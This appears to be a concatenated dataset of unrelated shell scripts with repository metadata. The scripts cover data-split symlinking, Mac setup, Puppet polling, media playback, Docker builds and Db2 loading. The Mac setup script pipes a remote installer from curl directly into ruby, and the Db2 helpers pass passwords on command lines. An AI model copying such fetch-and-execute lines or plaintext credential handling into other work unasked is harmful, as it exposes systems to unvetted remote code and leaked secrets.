for CLASS in ${CLASSES[@]}
do
echo -e "\t$CLASS"
done
test_ids=(70bb3032750d09e7549928c0dbf79afc30d7cb68 a1fc67fbb21f43b9e8904b9b46bd94f83493b37a f7f931a5cf3185a385e9aa34e6e9a566fc88000)
trainids=(c886827fe8c10b4699a0f1616331e36b46a05617 dfe3ee768f72bddd289c7d5bb88b15cbb89be7e6)
realpath() {
[[ $1 = /* ]] && echo "$1" || echo "$PWD/${1#./}"
}
for CLASS in ${CLASSES[@]}
do
mkdir -p ${DATADIR}/val/${CLASS}
mkdir -p ${DATADIR}/train/${CLASS}
for id in ${trainids[@]}
do
#echo ""
#ln -s ${DATADIR}/all/${CLASS}/${id}* ${DATADIR}/train/${CLASS}/
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'echo $PWD/$(readlink $1) ' _ {} \;
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $PWD/$(readlink $1) '${DATADIR}/train/${CLASS}/'' _ {} \;
find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $(readlink -f $1) '${DATADIR}/train/${CLASS}/'' _ {} \;
done
echo -e "see\t${DATADIR}/train/"
for id in ${test_ids[@]}
do
#ln -s ${DATADIR}/all/${CLASS}/${id}* ${DATADIR}/val/${CLASS}/
find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $(readlink -f $1) '${DATADIR}/test/${CLASS}/'' _ {} \;
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $PWD/$(readlink $1) '${DATADIR}/val/${CLASS}/'' _ {} \;
done
echo -e "see\t${DATADIR}/val/"
done
| true
|
aca772712c029e0b55599de2bf71113062f7423c
|
Shell
|
rubenerd/rubens-lunchbox
|
/resursive-ln.sh
|
UTF-8
| 238
| 3.1875
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
## Recursively build directory of symlinks
## Subdirectories also symlinked
## Desirable if you want to add files at root level
root=/some/directory
destination=.
for file in ${root}/*; do
ln -s ${file} ${destination}
done
| true
|
8864a92b78a8349d6a083ccc8f0ff8ec808a03b8
|
Shell
|
netqyq/shell-examples
|
/code/CH07/if_exam3.sh
|
UTF-8
| 170
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
# if_exam3: input a file name and test the file exist or not.
#!/bin/sh
if [ ! -e "$1" ]
then
echo "file $1 do not exist."
exit 1
else
echo "file $1 exits."
fi
| true
|
af3610e8333034f9a5e48dd87fa6a4ade3beffd5
|
Shell
|
patel327/ece364
|
/Prelab01/.svn/text-base/exist.bash.svn-base
|
UTF-8
| 192
| 3.296875
| 3
|
[] |
no_license
|
#! /bin/bash
#
#$Author$
#$Date$
#$HeadURL$
#$Revision$
#
while(($# != 0))
do
if [[ -r $1 ]]
then
echo "File $1 is readable!"
elif [[ ! -e $1 ]]
then
touch $1
fi
shift
done
exit 0
| true
|
ae356ef934fb2a533eece0044b52b0ca74eeb138
|
Shell
|
snikitav/palloc
|
/stress_test_suit.sh
|
UTF-8
| 291
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
mkdir -p build
cd build
for I in `seq 1 256`
do
for J in `seq 1 256`
do
echo "BLOCK_SIZE=$I POOL_SIZE=$J"
(cmake .. -DBLOCK_SIZE=$I -DPOOL_SIZE=$J -DCMAKE_BUILD_TYPE=Debug && make) &>/dev/null
./out/test/palloc_test
echo ""
done;
done;
| true
|
99fee1840a594612e96cc3e16c409441d099cc2b
|
Shell
|
hobofan/dotfiles
|
/bin/tat
|
UTF-8
| 121
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# Attach or create tmux session named the same as current directory.
#
tmux new-session -As `basename $PWD`
| true
|
232f7f051286fad17fac41375e58c739df9b2bba
|
Shell
|
HenryChenV/ChaosSpace
|
/rdo_reposerver/build.sh
|
UTF-8
| 1,320
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
if [ ! `id -u` == 0 ];then
echo pls run as root !
exit 1
fi
RDO_RELEASE=rdo-release-icehouse-4.noarch.rpm
RDO_DIR=openstack-icehouse/
RDO_ROOT=https://repos.fedorapeople.org/repos/openstack/
# #选择一台CentOS服务器,安装以下软件:
# yum -y install yum-utils createrepo yum-plugin-priorities
# yum -y install httpd
# #设置httpd
# chkconfig httpd on
# service httpd start
#获取repo文件并使用reposync同步源
# if [ -e $RDO_DIR/$RDO_RELEASE ]; then
# RDO_URL=$RDO_DIR/$RDO_RELEASE
# else
# RDO_URL=$RDO_RDOT/$RDO_DIR/$RDO_RELEASE
# fi
# yum -y install $RDO_URL
# yum repolist #可以看到源的id列表
#同步openstack-icehouse这个repo
cd /var/www/html/
reposync --repoid=openstack-icehouse
#
# #第一次同步时间较长,同步结束后
# createrepo –update /var/www/html/openstack-icehouse
# #此处若使用其他目录下的文件夹的符号链接到/var/www/html处,需要关闭SELinux的安全选项
# setenforce 0
#
# #添加以下内容到其中已有的22端口这条规则的下面
# sed -i.backup 's/\(-A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT\)/\1\n-A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT\n-A INPUT -m state --state NEW -m tcp -p tcp --dport 3306 -j ACCEPT/' /etc/sysconfig/iptables
exit 0
| true
|
e9a2d736f35dca0cfe1d3d2ac005d7ee86d48fac
|
Shell
|
kaltura/server-bin-linux-64bit
|
/run/run-segmenter.sh
|
UTF-8
| 371
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
SYSTEM_INI_FILE=/etc/kaltura.d/system.ini
if [ -r "$SYSTEM_INI_FILE" ];then
. $SYSTEM_INI_FILE
else
echo "I could not source $SYSTEM_INI_FILE. Exiting."
exit 1
fi
KALTURA_BIN=$BASE_DIR/bin
KALTURA_BIN_DIRS=$KALTURA_BIN
KALTURA_BIN_FFMPEG=$KALTURA_BIN_DIRS/ffmpeg-0.10-dir/lib
LD_LIBRARY_PATH=$KALTURA_BIN_FFMPEG $KALTURA_BIN_FFMPEG/segmenter $@
| true
|
9b9e0ba731cc36853cc5a65404a0cf6d4ccd338f
|
Shell
|
lavacano/pengwin-setup
|
/pengwin-setup.d/uninstall/go.sh
|
UTF-8
| 469
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# shellcheck source=/usr/local/pengwin-setup.d/uninstall/uninstall-common.sh
source "$(dirname "$0")/uninstall-common.sh" "$@"
function main() {
echo "Uninstalling go"
echo "Removing $go_dir"
sudo_rem_dir "/usr/local/go"
echo "Removing go build cache"
rem_dir "$HOME/.cache/go-build"
echo "Removing PATH modifier..."
sudo_rem_file "/etc/profile.d/go.sh"
# whiptail user go directory
}
if show_warning "go" "$@"; then
main "$@"
fi
| true
|
724795a6eb3cd7c63969f84aa198b91be73c73cd
|
Shell
|
k-tada/dotfiles
|
/setup_scripts/nvim.sh
|
UTF-8
| 235
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
function command_exists {
command -v "$1" > /dev/null;
}
###
# install NeoVim
if ! command_exists nvim ; then
echo " --- NeoVim --- "
brew install neovim/neovim/neovim
pip install neovim
echo " --- End --- "
fi
| true
|
f8d9d89d2b0a1a55e97b003d7d4631f40b00f1b5
|
Shell
|
dcrdev/cardano-nft-maker
|
/init.sh
|
UTF-8
| 392
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
network="testnet"
working_dir="$HOME/cardano-nft-maker-testnet"
if [[ $1 == 'mainnet' ]]; then
network="mainnet"
working_dir="$HOME/cardano-nft-maker-mainnet"
cp keys/main.payment.* ./backend-server/mainnet/priv/wallet/main
else
cp keys/test.payment.* ./backend-server/testnet/priv/wallet/test
fi
cp keys/arweave-key* ./backend-server
echo "${working_dir} ${network}"
| true
|
c90012fb985bf4da036523b069982dacb79b35d5
|
Shell
|
kirakira/opencensus-cpp
|
/tools/presubmit.sh
|
UTF-8
| 1,739
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# presubmit:
# Run a slow but complete check of the code to make sure:
# - Everything builds.
# - Tests pass.
# - Sanitizers pass.
#
# This is intended to be run manually and locally, not as part of
# continuous integration.
readonly R="======================================="
readonly BOLD="\\033[1m"
readonly ERR="\\033[31;1m"
readonly NORMAL="\\033[0m"
function run() {
echo ""
echo -e "${BOLD}${R}${R}"
echo "Running: $@"
echo -e "${R}${R}${NORMAL}"
$@
ret="$?"
if [[ "${ret}" -ne 0 ]]; then
echo ""
echo -e "${ERR}>>> Error: returned code ${ret} <<<${NORMAL}"
exit ${ret}
fi
}
t0="$(date +%s)"
buildables="-- $(bazel query -k --noshow_progress "kind('^cc', //...)")"
tests="-- $(bazel query -k --noshow_progress \
"kind(test, //...) \
except attr('tags', 'manual', //...)")"
run bazel build $buildables
run bazel test $tests
run bazel build -c opt $buildables
run bazel test -c opt $tests
for config in asan ubsan; do
run bazel test --config=$config $tests
run bazel test --config=$config -c opt $tests
done
t1="$(date +%s)"
echo ""
echo "Succeeded after $((t1 - t0)) secs."
| true
|
9439c8b84eaea415e37fa79c0e9281178fc0cb7b
|
Shell
|
qqqestion/dot-files
|
/.zshrc
|
UTF-8
| 1,394
| 2.78125
| 3
|
[] |
no_license
|
# Path to your oh-my-zsh installation.
# export ZSH="~/.oh-my-zsh"
ZSH=$HOME/.oh-my-zsh
# this makes vim works with cntr-s command
stty -ixon
# Warning: Failed to set locale category LC_COLLATE to en_CH.
#
export LC_ALL=en_US.UTF-8
export PYTHONPATH=${PYTHONPATH}:/Library/Python/3.8/site-packages
# Set name of the theme to load --- if set to "random", it will
# load a random theme each time oh-my-zsh is loaded, in which case,
# to know which specific one was loaded, run: echo $RANDOM_THEME
# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
ZSH_THEME='spaceship'
plugins=(
git
zsh-syntax-highlighting
zsh-autosuggestions
)
source $ZSH/oh-my-zsh.sh
export DOT_FILES='~/GitHub/dot-files'
# zsh aliases
alias ll="ls -la"
alias zshc="vim $DOT_FILES/.zshrc"
alias vimc="vim $DOT_FILES/.vimrc"
alias zshs="source $DOT_FILES/.zshrc"
alias vims="source $DOT_FILES/.vimrc"
alias rmdir="rm -fr"
alias md='mkdir'
alias showusage="ps -Ar -o \"pid %cpu %mem user comm\""
# git aliases
alias ga="git add"
alias gctm="git commit -m"
alias gct="git commit"
alias gpush="git push"
alias gpull="git pull"
alias gs="git status"
alias gc="git clone"
alias gd="git diff"
alias gb="git branch"
alias gcout="git checkout"
# mysql
alias mysql="/usr/local/mysql/bin/mysql -u root -p"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# programming aliases
alias c="clang++ -std=c++17 -o app"
prompt_context(){}
| true
|
5cd0afeae64855a90b02e8b1f6b1b5a56f488414
|
Shell
|
Swifree/init-script
|
/init-mac.sh
|
UTF-8
| 1,896
| 3.25
| 3
|
[] |
no_license
|
# 当配置不存在时添加配置到~/.bash_profile
addConfigIFNX()
{
echo $1
f=~/.bash_profile
touch $f
if [ $(fgrep -c $1 $f) -eq 0 ]
then
echo $1 >> $f
fi
#配置立即生效
source $f
}
# 判断函数是否存在
notFound()
{
type $1 | grep -c 'not found'
}
# 安装homebrew
if [ $(notFound brew) -gt 0 ]
then
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
brew tap caskroom/versions
fi
# 禁止brew自动更新,不然brew install会先执行brew update,由于众所周知的原因,无法科学上网,导致brew install卡在brew updating上
addConfigIFNX 'export HOMEBREW_NO_AUTO_UPDATE=true'
# 安装vscode并且添加命令code,可以使用code path 命令使用vscode打开文件或文件夹
brew cask install visual-studio-code &
# 如果没安装go,安装go
if [ $(notFound go) -gt 0 ]
then
brew install go
addConfigIFNX 'export GOPATH=~/go'
fi &
# terminal的SF Mono字体挺好看的,复制到系统字体库,iterm2也可以用这个字体了
cp -R /Applications/Utilities/Terminal.app/Contents/Resources/Fonts/. /Library/Fonts/
# 如果没安装zsh, 安装zsh
if [ $(notFound zsh) -gt 0 ]
then
brew install zsh;
echo '. ~/.bash_profile' >> ~/.zshrc
fi &
# 安装完iterm2后进入Profiles -> Colors -> Color Presets选择Tango Dark
# 然后进入Profiles -> Window -> Transparency调到50%左右,可好看了,colomns:170,rows:100
# Profiles -> Text 12pt SF Mono Semibold, Keys-> hotkey设置唤起iterm的快捷键,我一般用cmd + option + t
brew cask install iterm2 &
brew cask install java8
addConfigIFNX 'export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_172.jdk/Contents/Home'
if [ $(notFound mvn) -gt 0 ]
then
brew install maven
fi &
brew cask install google-chrome &
brew cask install shadowsocksx-ng &
| true
|
c6f098e5d6a2c3ca403c4f23dd3d59aa7f63acef
|
Shell
|
DANS-KNAW/easy-bag-store
|
/src/main/assembly/dist/bin/send-bag-store-report.sh
|
UTF-8
| 1,549
| 4.28125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Helper script to create and send a list of all DOIs stored in a given bag-store
#
# Usage: ./send-archived-datasets-report.sh <bag-store> <from-email> <to-email> [<bcc-email>]
#
BAGSTORES_BASEDIR=$1
DARK_HOST=$2
BAGSTORE=$3
FROM=$4
TO=$5
BCC=$6
TMPDIR=/tmp
DATE=$(date +%Y-%m-%d)
REPORT=$TMPDIR/$BAGSTORE-dois-$DATE.csv
if [ "$FROM" == "" ]; then
FROM_EMAIl=""
else
FROM_EMAIL="-r $FROM"
fi
if [ "$BCC" == "" ]; then
BCC_EMAILS=""
else
BCC_EMAILS="-b $BCC"
fi
TO_EMAILS="$TO"
exit_if_failed() {
local EXITSTATUS=$?
if [ $EXITSTATUS != 0 ]; then
echo "ERROR: $1, exit status = $EXITSTATUS"
echo "Report generation FAILED. Contact the system administrator." |
mail -s "FAILED: Report: DOIs of datasets archived in bag-store $BAGSTORE" \
$FROM_EMAIL $BCC_EMAILS $TO
exit 1
fi
echo "OK"
}
echo -n "Creating list of DOIs in bag-store $BAGSTORE..."
find $BAGSTORES_BASEDIR/$BAGSTORE/ -name 'dataset.xml' | xargs cat | grep 'id-type:DOI' | sed -r 's/^.*>(.*)<.*$/\1/' > $REPORT
exit_if_failed "DOI list creation failed"
echo -n "Getting total disk usage of bag-store $BAGSTORE..."
DISK_USAGE=$(du -cbsh $BAGSTORES_BASEDIR/$BAGSTORE)
exit_if_failed "disk space usage report failed"
echo -n "Sending e-mail..."
echo -e "bag-store: $BAGSTORE\ndisk usage: $DISK_USAGE\nDOI list: see attached file" | \
mail -s "$DARK_HOST Report: status of bag-store: $BAGSTORE" -a $REPORT $BCC_EMAILS $FROM_EMAIL $TO_EMAILS
exit_if_failed "sending of e-mail failed"
| true
|
099dcf90786ab6d27a452477001cd18f13ae756d
|
Shell
|
wase90168/docker-lecture
|
/solution/install.sh
|
UTF-8
| 927
| 3.3125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
# Install updates
apt-get update
apt-get upgrade -y
# Adding some empty lines for readability
echo ""; echo ""; echo ""
# Install Docker
apt-get update
apt-get install apt-transport-https ca-certificates curl software-properties-common python-pip python-setuptools -y
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get install docker-ce -y
# Installing docker-compose
pip install wheel
pip install docker-compose
# Adding some empty lines for readability
echo ""; echo ""; echo ""
# Installing the environment and downloading all necessary files
echo "Installing environment..."
mkdir /opt/sysad/
cd /opt/sysad/
git clone https://github.com/wase90168/docker-lecture.git
| true
|
bdf56807b0d21b8cb120e4a909dcb3cc2a16fe54
|
Shell
|
thanethomson/lifetracker-iter3
|
/scripts/run-compose.sh
|
UTF-8
| 459
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
if [ -z "$1" ] || [ -z "$2" ]; then
echo "Usage: ./run-compose.sh <lifetracker_db_password> <postgres_password> [optional_compose_cmd]"
exit 1
fi
if [ -z "${IMAGE_TAG}" ]; then
export IMAGE_TAG="0.1.0-stretch"
fi
if [ -z "$3" ]; then
export COMPOSE_CMD=up
else
export COMPOSE_CMD=$3
fi
IMAGE_TAG=${IMAGE_TAG} \
LIFETRACKER_DATABASE_PASSWORD=$1 \
POSTGRES_PASSWORD=$2 \
docker-compose \
$COMPOSE_CMD
| true
|
e712f17c0243e14a970663dd8220a0b5e632a7c6
|
Shell
|
velentr/shellscripts
|
/doccount.sh
|
UTF-8
| 356
| 3.0625
| 3
|
[
"LicenseRef-scancode-other-permissive",
"MIT"
] |
permissive
|
#!/bin/sh
count=0
for f in *.pdf; do
count=`expr $count + $(pdfinfo "$f" 2> /dev/null | grep -a -e Pages | awk '{ print $2 }')`
done
for f in *.djvu; do
count=`expr $count + $(echo "n" | djvused "$f")`
done
for f in *.ps; do
count=`expr $count + $(psselect -p_1 $f 2>&1 >/dev/null | cut -f1 -d' ' | sed 's/\[//;s/\]//')`
done
echo $count
| true
|
f18cf2f5cf56c51c37b22f2e6cda65c4090fbddc
|
Shell
|
sylarLiu/Linux-Xenomai
|
/linux-3.18.20_xenomai-2.6.5/scripts/install_orocostoolchain2.9_onxenomai.sh
|
UTF-8
| 1,547
| 3.359375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
#==============================================================================
# Copyright (C) 2018 . All rights reserved.
#
# File Name : install_orocostoolchain2.9_onxenomai.sh
# Author : sylar.liu
# E-mail : sylar_liu65@163.com
# Created Time : 2018/11/12 21:06:29
# Description : This script is used to build orocos-toolchain on xenomai
#
#==============================================================================
OROCOS_INSTALL_PREFIX="/opt/orocos-2.9"
ROS_INSTALL_PREFIX="/opt/ros/kinetic"
ROS_DISTRO="kinetic"
user=`whoami`
if [ $user != "root" ]; then
echo -e "You have to execute the script with sudo."
exit 1
fi
# import Xenomai environment
source ~/.xenomai_rc
# Compile for Xenomai
export OROCOS_TARGET=xenomai
mkdir -p $OROCOS_INSTALL_PREFIX/src
cd $OROCOS_INSTALL_PREFIX/src
# Get all the packages
wstool init
wstool merge https://raw.githubusercontent.com/kuka-isir/rtt_lwr/rtt_lwr-2.0/lwr_utils/config/orocos_toolchain-2.9.rosinstall
wstool update -j$(nproc)
# Get the latest updates (OPTIONAL)
cd orocos_toolchain
git submodule foreach git checkout toolchain-2.9
git submodule foreach git pull
cd $OROCOS_INSTALL_PREFIX
# Install dependencies
source $ROS_INSTALL_PREFIX/setup.bash
rosdep install --from-paths $OROCOS_INSTALL_PREFIX/src --ignore-src --rosdistro $ROS_DISTRO -y -r
catkin config --init --install --extend $ROS_INSTALL_PREFIX --cmake-args -DCMAKE_BUILD_TYPE=Release -DENABLE_MQ=ON -DENABLE_CORBA=ON -DCORBA_IMPLEMENTATION=OMNIORB
catkin build
| true
|
5ff710630da2dbe92d188e8186c8493d70e918ee
|
Shell
|
wslab/kubes
|
/snoop-servlet/build.sh
|
UTF-8
| 361
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Build the snoop servlet image and push it to the local registry.
#
# BUG FIX: the original used 'return' at the top level of an executed
# script; bash rejects that ("can only `return' from a function") and
# carried on, so a failed build still attempted the push. Use 'exit 1'.
REPO=localhost:32000
LABEL=dev

echo "building image, tag: ${REPO}/snoop:${LABEL}"
if ! docker build -t "${REPO}/snoop:${LABEL}" .; then
    echo "docker build error, stop." >&2
    exit 1
fi

echo "publishing to ${REPO}/snoop:${LABEL}"
if ! docker push "${REPO}/snoop:${LABEL}"; then
    echo "docker publish error, stop." >&2
    exit 1
fi

echo "Done."
| true
|
8132313f83c92d1162289203e65690f68500ed4e
|
Shell
|
sdothum/dotfiles
|
/bin/bin/functions/media/play
|
UTF-8
| 3,990
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/dash
# sdothum - 2016 (c) wtfpl
# Media
# ══════════════════════════════════════════════════════════════════════════════
# ................................................................. Media player
# Usage: play <url> | [-q] <path> [<title>]
#
# Note: <path> may be a media file or folder containing such
fontsize=36
ext='avi|Avi|divx|Divx|m4v|M4v|mkv|Mkv|mp4|Mp4|wmv|Wmv'
delay=1 # for "next" xdotool key sequence
pgrep -f 'dmenu series' && next='next\n'
YOUTUBE=/net/downloads/http/youtube-dl
# cleanup accidental screenshots and youtube-dl
trap "rm -f $HOME/mpv-shot*.jpg" EXIT
[ "$1" = '-q' ] && { quiet=true; shift; }
# play media (see rox, dmenu movies, dmenu series, browsers..)
[ "$2" ] && title=$2 || title=${1##*/}
if cpu arm ;then
# youtube playback on raspberry pi architecture is unsupported
if echo $1 | grep -q http ;then
rm -f $YOUTUBE*
# leverage cpu power of network server for download and media conversion
term youtube-dl FLOAT SHELL "ditto youtube-dl "$1" && ssh $SERVER youtube-dl -o $YOUTUBE "$1""
pwait "$YOUTUBE"
title=$YOUTUBE
STREAM=$(find ${YOUTUBE%/youtube-dl} -name 'youtube-dl*')
if [ ${STREAM##*.} = webm ] ;then
term youtube-dl FLOAT SHELL "ditto youtube-dl "$1" && ssh $SERVER ffmpeg -y -i "$STREAM" "${STREAM%.*}.mp4""
ssh $SERVER ffmpeg -i "$STREAM" "${STREAM%.*}.mp4"
pwait "${STREAM%.*}.mp4"
STREAM="${STREAM%.*}.mp4"
fi
fi
geometry=$(dmenu geometry "$title") || exit
fi
# check for attached usb drive
if [ -z $STREAM ] ;then
[ -d "$1" ] && path=$1 || path=${1%/*}
# attached usb drive?
libext=$(find /run/media/$USER -maxdepth 3 -type d -name "$(basename $(dirname "$path"))" 2>/dev/null)
if [ -n "$libext" ] ;then
STREAM=$(find "$libext" -maxdepth 1 -type d -name "${path##*/}")
STREAM=$(find "$STREAM" -regextype posix-extended -regex ".*($ext)" | grep -v sample)
else
STREAM=$1
fi
fi
videomode on
while : ;do
if cpu arm ;then
notify 0 blackboard "$title" '1/2 Speed\n+/- Volume\nj/k Language\nm/n Subtitles\ns Toggle'
# syncthing cpu usage can exacerbate video stuttering
# sv stop syncthing@$USER
# omxplayer keyboard shortcuts only available through terminal emulator
# eval term 'omxplay' BLACKBOARD omxplayer $geometry --subtitles "${STREAM%.*}.srt" --align center "$STREAM"
# media filenames with embedded blanks are messy to handle, use symbolic link instead!
ln -sf "$STREAM" /tmp/play:link
eval term 'omxplay' BLACKBOARD omxplayer $geometry --align center /tmp/play:link
echo "$title -> $STREAM" >>/tmp/omxplay.log
# accomodate arm term omxplayer lag time variance
sleep 1
pwait /tmp/play:link
# sv start syncthing@$USER
# clear notification
xdotool key Ctrl+space
touch $MENU
else
notify 0 blackboard "$title" "$(printf '1/2^Contrast\n3/4^Brightness\n5/6^Gamma\n7/8^Saturation\n9/0^Volume^m^Mute\n-/+^Audio Delay^ #^Language\nj/J^Subtitles^ v^Toggle\nx/z^Subtitle Delay' | column -s^ -t)"
focus frame
mpv --vf=eq "$STREAM" --sub-font-size=$fontsize >/dev/null 2>&1 &
# clear notification
pwait "mpv --vf=eq"
xdotool key Ctrl+space
fi
echo "$1" | grep -q http && break
[ $quiet ] && break
# only purges server files (arm redirected usb files remain untouched)
action=$(echo "${next}quit\nskip\nreplay\ndelete\nsonarr" | rmenu "$title" -no-custom)
case $action in
delete)
[ "$(echo 'no\nyes' | rmenu "Delete $title" -no-custom)" = yes ] || break
mhistory play:delete "$title $1"
rm -rf "$1"
break ;;
next )
(sleep $delay; xdotool key Down; xdotool key Return;) & # key presses for episodes menu
break ;;
quit ) pkill -f 'dmenu'; blackboard; videomode off; exit ;; # restore dynamic windows
replay) pulse; continue ;;
sonarr) sonarr $STREAM; break ;;
* ) break ;;
esac
done
videomode off
# vim: set ft=sh: #
| true
|
58956858521706fc064339a4f1ce925eff291d05
|
Shell
|
da99/da_spec
|
/sh/test
|
UTF-8
| 196
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
#
# Build the project, then run every compiled *.spec.mjs spec under
# dist/spec/ with node.
set -u -e -o pipefail
# Resolve the repo root (parent of this script's directory) and work there.
# 'local +x' is zsh-specific: a non-exported, script-local variable.
local +x THIS_DIR="$( dirname "$(realpath "$0")" )/.."
cd "$THIS_DIR"
sh/build
set -x
# -I F substitutes each found spec path into the 'node F' command line,
# so specs run one process at a time.
find dist/spec/ -type f -name "*.spec.mjs" | xargs -I F node F
| true
|
764825b1bd6262f3c0521a864212d3daf610d51f
|
Shell
|
rachelmccown/hangman-secureci-tester-max
|
/coveros_opensource_ci_cd-master/hangmaninstaller/signed.sh
|
UTF-8
| 643
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Poll the Puppet master until host $1's certificate is signed and its
# facts (internal and EC2 public IP) become available, retrying every 5s.
set -x
SIGNED=""
# Wait until the certificate status for $1 contains "signed".
while [ -z "$SIGNED" ] ; do SIGNED=`curl -k -H "Accept: pson" https://puppetmaster.demo.secureci.com:8140/production/certificate_status/$1 | grep signed` ; echo checking tomcat - Exists:$1; sleep 5; done
FACTS=""
# Wait until the node's facts include an internal "ipaddress:" entry.
while [ -z "$FACTS" ] ; do FACTS=`curl -k -H "Accept: yaml" https://puppetmaster.demo.secureci.com:8140/production/facts/$1 | grep ipaddress:` ; echo checking tomcat:$1 - intip; sleep 5; done
FACTS=""
# Then wait for the EC2 public IPv4 fact as well.
while [ -z "$FACTS" ] ; do FACTS=`curl -k -H "Accept: yaml" https://puppetmaster.demo.secureci.com:8140/production/facts/$1 | grep ec2_public_ipv4:` ; echo checking tomcat:$1 - extip; sleep 5; done
| true
|
89309968c0a0d2d4904af3c5fa1d8c62b32e05b2
|
Shell
|
stanislawbartkowski/mytpcds
|
/proc/db2commonproc.sh
|
UTF-8
| 3,720
| 3.671875
| 4
|
[
"Apache-2.0"
] |
permissive
|
# -----------------------------------
# my db2 command shell functions
# version 1.00
# 2021/11/11
# 2021/12/02 - added set -x w at the beginning
# 2021/12/12 - change in loadserver
# 2021/12/18 - db2clirun, timeout detection
# 2021/12/16 - db2clirun, load messages
# -----------------------------------
#set -x
#w
db2clirun() {
required_var DBPASSWORD
local -r CONNECTION="DATABASE=$DBNAME;HOSTNAME=$DBHOST;PORT=$DBPORT;UID=$DBUSER;PWD=$DBPASSWORD"
local -r sqlinput=$1
local -r ITEMP=`crtemp`
local -r OTEMP=`crtemp`
[ -n "$SCHEMA" ] && echo "SET CURRENT SCHEMA $SCHEMA ;" >$ITEMP
cat $1 >>$ITEMP
$QUERYTIMEOUT db2cli execsql -statementdelimiter ";" -connstring "$CONNECTION" -inputsql $ITEMP -outfile $OTEMP
[ $? -eq 124 ] && return 124
# timeout
local RES=0
if grep "ErrorMsg" $OTEMP; then
logfile $OTEMP
log "Error found while executing the query, check logs"
RES=8
fi
cat $OTEMP
return $RES
}
##################################################
# DB2 load delimited file from server location
# important: text file delimited by |
# Arguments:
# $1 - table to load
# $2 - server location of delimited file
#######################################
db2loadfileserver() {
local -r TABLENAME=$1
local -r INLOADFILE=$2
local -r TMPS=`crtemp`
local -t MESSFILE=/tmp/$TABLENAME.txt
# local -r SFILE=`serverfile $INLOADFILE`
cat << EOF > $TMPS
CALL SYSPROC.ADMIN_CMD('load from $INLOADFILE of del modified by coldel$COLDEL MESSAGES ON SERVER replace into $TABLENAME NONRECOVERABLE');
EOF
db2clirun $TMPS
}
# Map a local file path to its location under the server prefix directory.
# $1 - path; only its basename is kept.
# Outputs "$PREFIXSERVER/<basename of $1>" on stdout.
serverfile() {
    local -r name=$(basename "$1")
    echo "$PREFIXSERVER/$name"
}
##################################################
# DB2 load delimited file from S3 bucker
# important: text file delimited by |
#
# GLOBALS:
# PREFIXSERVER: root directory in S3 bucket, prefix to $2
# ENDPOINT: S3 endpoint
# AWSKEY: AWS key
# AWSSECRETKEY: AWS secret key
# BUCKET: AWS secret
# Arguments:
# $1 - table to load
# $2 - location in S3 bucket of file to load
#####################################################
db2loadfiles3() {
local -r TABLENAME=$1
local -r INLOADFILE=$2
local -r TMPS=`crtemp`
required_listofvars PREFIXSERVER ENDPOINT AWSKEY AWSSECRETKEY BUCKET
local -r S3FILE=`serverfile $INLOADFILE`
log "Loading from $S3FILE S3/AWS file"
cat << EOF > $TMPS
CALL SYSPROC.ADMIN_CMD('LOAD FROM S3::$ENDPOINT::$AWSKEY::$AWSSECRETKEY::$BUCKET::$S3FILE OF DEL modified by coldel$COLDEL REPLACE INTO $TABLENAME NONRECOVERABLE');
EOF
db2clirun $TMPS
# jdbcqueryupdatefile $TMPS
}
# Connect the db2 CLI session to $DBNAME as $DBUSER, then set the current
# schema when $SCHEMA is non-empty.
# Globals (read): DBNAME, DBUSER, DBPASSWORD, SCHEMA
# Exits via logfail on connect/schema failure.
db2connect() {
    required_command db2
    required_var DBNAME DBUSER DBPASSWORD
    log "Connecting to $DBNAME user $DBUSER"
    db2 connect to $DBNAME user $DBUSER using $DBPASSWORD
    [ $? -ne 0 ] && logfail "Cannot connect to $DBNAME"
    # No schema requested: connection alone is enough.
    [[ -z $SCHEMA ]] && return 0
    log "Set schema $SCHEMA after connection"
    [[ -n $SCHEMA ]] && db2 "set current schema $SCHEMA"
    [ $? -ne 0 ] && logfail "Cannot set schema $SCHEMA"
}
